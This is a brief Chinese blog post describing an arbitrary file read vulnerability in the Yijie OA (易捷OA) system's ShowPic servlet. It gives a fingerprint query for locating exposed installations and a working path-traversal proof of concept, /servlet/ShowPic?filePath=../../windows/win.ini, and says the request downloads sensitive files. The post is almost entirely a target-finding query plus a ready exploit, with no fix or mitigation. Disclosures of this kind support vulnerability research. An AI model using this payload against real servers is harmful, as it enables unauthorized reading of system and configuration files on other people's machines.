易捷OA存在ShowPic任意文件读取漏洞漏洞

Posted on 2024-08-17  13 Views


网络测绘

body="/images/logon/bg_img.jpg"

漏洞POC

地址/servlet/ShowPic?filePath=../../windows/win.ini

访问后可下载敏感文件